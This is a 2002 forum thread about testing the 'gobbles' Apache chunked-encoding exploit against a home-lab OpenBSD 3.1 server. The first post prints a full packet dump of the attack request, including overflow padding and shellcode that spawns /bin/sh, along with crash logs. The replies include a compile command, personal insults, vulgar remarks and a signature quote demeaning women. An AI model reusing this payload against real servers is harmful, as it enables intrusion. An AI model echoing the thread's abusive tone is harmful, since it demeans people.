Apache chunked (gobbles) exploit on OpenBSD 3.1
Results 1 to 8 of 8

Thread: Apache chunked (gobbles) exploit on OpenBSD 3.1

  1. #1

    Apache chunked (gobbles) exploit on OpenBSD 3.1

    Hey guys, just a simple question for you all. I just recently installed OpenBSD 3.1
    on my home network. I obtained the apache chunked encoding vulnerability aka gobbles
    from packetstorm and ran it against my OpenBSD 3.1 host from another node on my small home
    network.

    My attacking host is 192.168.0.1 and my OpenBSD box is 192.168.0.4

    Here is the packet payload just for clarity.




    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8177 IpLen:20 DgmLen:44 DF
    ******S* Seq: 0x2602714E Ack: 0x0 Win: 0x3EBC TcpLen: 24
    TCP Options (1) => MSS: 1460

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.4:80 -> 192.168.0.1:1471 TCP TTL:64 TOS:0x0 ID:45605 IpLen:20 DgmLen:44 DF
    ***A**S* Seq: 0x30F6508D Ack: 0x2602714F Win: 0x4470 TcpLen: 24
    TCP Options (1) => MSS: 1460

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8178 IpLen:20 DgmLen:40 DF
    ***A**** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8179 IpLen:20 DgmLen:1500 DF
    ***AP*** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20
    47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
    48 6F 73 74 3A 20 61 70 61 63 68 65 2D 73 63 61 Host: apache-sca
    6C 70 2E 63 0D 0A 58 2D 43 43 43 43 43 43 43 3A lp.c..X-CCCCCCC:
    20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 89 E2 83 EC 10 6A 10 54 52 6A 00 6A 00 B8 1F A.....j.TRj.j...
    00 00 00 CD 80 80 7A 01 02 75 0B 66 81 7A 02 05 ......z..u.f.z..
    BF 75 03 EB 0F 90 FF 44 24 04 81 7C 24 04 00 01 .u.....D$..|$...
    00 00 75 DA C7 44 24 08 00 00 00 00 B8 5A 00 00 ..u..D$......Z..
    00 CD 80 FF 44 24 08 83 7C 24 08 03 75 EE 68 0B ....D$..|$..u.h.
    6F 6B 0B 81 34 24 01 00 00 01 89 E2 6A 04 52 6A ok..4$......j.Rj
    01 6A 00 B8 04 00 00 00 CD 80 68 2F 73 68 00 68 .j........h/sh.h
    2F 62 69 6E 89 E2 31 C0 50 52 89 E1 50 51 52 50 /bin..1.PR..PQRP
    B8 3B 00 00 00 CD 80 CC 0D 0A 58 2D 43 43 43 43 .;........X-CCCC
    43 43 43 3A 20 41 41 41 41 41 41 41 41 41 41 41 CCC: AAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 AAAA

    Now the problem is this. From the information I have gathered, this exploit should work on a default
    install of OpenBSD 3.1, so im wondering why the exploit failed. I downloaded OpenBSD 3.1 from
    their ftp server, so perhaps the vulnerabilty is patched? I also have 2 other questions

    1. as you can see, near the end of the packet paylod, you can see the shell trying to be executed, but shouldent it be /bin/sh not /sh.h/bin? Is that just the way snort(1.8.6) saw the payload? i guess what im saying here is do i have to edit the shellcode to execute /bin/sh instead of sh.h/bin
    you know, to "skript kiddie proof" it?

    2. If thats not the case, is the downloadable version of 3.1 patched for this vulnerability?
    its strange because OpenBSD http's reports segfaults and does indeed crash.


    Here is some of the process listings and apache error messages from the vulnerable? OpenBSD box


    USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
    root 17756 0.0 0.3 292 216 p0 R+ 7:32PM 0:00.00 ps -aux
    www 32247 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 29974 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 25120 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 10393 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    root 1 0.0 0.3 344 204 ?? Is 8:33PM 0:00.04 /sbin/init
    root 11321 0.0 0.6 104 368 ?? Ss 8:34PM 0:00.35 syslogd
    root 31095 0.0 0.4 64 252 ?? Is 8:34PM 0:00.01 portmap
    root 20679 0.0 2.0 1092 1284 ?? Ss 8:34PM 0:05.59 /usr/sbin/httpd
    root 8041 0.0 0.5 52 292 ?? Is 8:34PM 0:00.01 inetd
    root 29048 0.0 1.3 372 824 ?? Is 8:34PM 0:02.75 /usr/sbin/sshd
    root 30762 0.0 0.6 200 376 ?? Is 8:34PM 0:00.29 cron
    root 31491 0.0 0.4 36 252 ?? Is 8:34PM 0:00.00 /usr/sbin/wsmoused YES
    root 256 0.0 0.6 48 412 C0 Is+ 8:34PM 0:00.11 /usr/libexec/getty Pc ttyC0
    root 8241 0.0 0.6 44 408 C2 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC2
    root 15543 0.0 0.6 48 412 C3 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC3
    root 10110 0.0 0.6 48 412 C5 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC5
    kpomeroy 27528 0.0 0.4 376 284 C1 Is+ 11:21AM 0:00.07 -sh (sh)
    root 5192 0.0 1.9 428 1260 ?? S 7:30PM 0:01.87 sshd: root@ttyp0 (sshd)
    root 15257 0.0 0.5 388 300 p0 Ss 7:31PM 0:00.12 -sh (sh)
    www 7017 0.0 1.1 1092 720 ?? R 7:32PM 0:00.07 /usr/sbin/httpd
    www 4903 0.0 0.9 1092 548 ?? S 7:32PM 0:00.06 /usr/sbin/httpd
    www 24768 0.0 0.9 1092 548 ?? S 7:32PM 0:00.07 /usr/sbin/httpd
    www 16385 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
    www 14030 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
    www 16972 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
    www 13920 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
    www 14357 0.0 0.9 1092 548 ?? S 7:32PM 0:00.10 /usr/sbin/httpd
    www 3627 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
    www 29871 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
    www 14280 0.0 0.9 1092 548 ?? S 7:32PM 0:00.12 /usr/sbin/httpd
    www 2937 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)

    You can see the Crashed (Zombie) httpd processes, and also here is the /usr/apache/log/error_log
    and access_log

    [Thu Oct 17 19:28:17 2002] [notice] child pid 9107 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 26116 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 6840 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 21560 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 30550 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 7442 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 14554 exit signal Segmentation fault (11)

    as you can see httpd indeed does crash, which leads me to believe that
    the 3.1 that I downloaded via ftp from openbsd.org was not patched, but anyway
    I could not spawn a shell on my attacking box and I was curious as to why thats all.

    Regards

    kurt

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Well if you downloaded from the .../OpenBSD/3.1/ dir on the ftp server you should have the plain release of 3.1 (.../OpenBSD/snapshots/ on the otherhand are "in-between releases" of -current)

    As for why the exploit doesn't work (or doesn't seem to), I couldn't say for sure (it's been a while already since the exploit came out...). I haven't played with the exploit myself, but if I remember right, the gobbles exploit didn't do it for everyone: something to do with the default offset... your best bet would be to search the misc@openbsd.org archives
    (http://www.sigmasoft.com/cgi-bin/wil...ields=filelist)

    Ammo
    Credit travels up, blame travels down -- The Boss

  3. #3
    Junior Member
    Join Date
    Oct 2002
    Posts
    6
    I was wondering if you guys could help me compile the apache-scalp.c code, I an new to coding in unix. I've attemped the " make apache-scalp.c " but obviously more syntax is needed, & I an unfamiliar with Emacs. Can someone please walk me through compiling this code? Thanks

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    *************
    I've attemped the " make apache-scalp.c " but obviously more syntax is needed,
    *************

    and you expect me to think your more than just a script kiddie a wanna be at that.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  5. #5
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Well, slackwarelinux

    i agree on it being /bin/sh so I think somewhere something must have gone wrong.

    but I never tried ne of the packetstorm stuff myself.
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  6. #6
    Junior Member
    Join Date
    Oct 2002
    Posts
    6
    gcc -c scalp.c -o ./scalp_run -Fukin A, you guys need to get laid - head over to tommys-bookmarks and cuff one off
    -peace

  7. #7
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Well thanks for the advice, MDMAZER0. I personaly like thehun better
    and wow you found out how to compile a c program in the unix enviroment (although I wouldn't do it as stated above, but hey, that's just me)

    I've looked into the gobbles and didn't seem to get it to work, but then again, I didn't realy try.. Good luck slackwarelinux
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  8. #8
    Junior Member
    Join Date
    Oct 2002
    Posts
    6
    Sorry guy - that was dirrected at Tedob1 - we need less Flameing in theses forums and more dispersal of knowledge, its a sad world when one simple question like "how can I do this..." or "I'm new to this... can you help? bla bla bla" will get you tossed in a mix. Should I bow down at your 1500 posts in awe, or your leet hacking skills? Do I claim to be a hacker or a script-kiddie ? Neither - rather I am a simply a student asking a simple question. Exploring someone else's code, in a closed enviornment for the fun of it or what ever I please. Why don't you think about some of the **** in your obviously troubled mind before it hits the key board. have a nice day.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •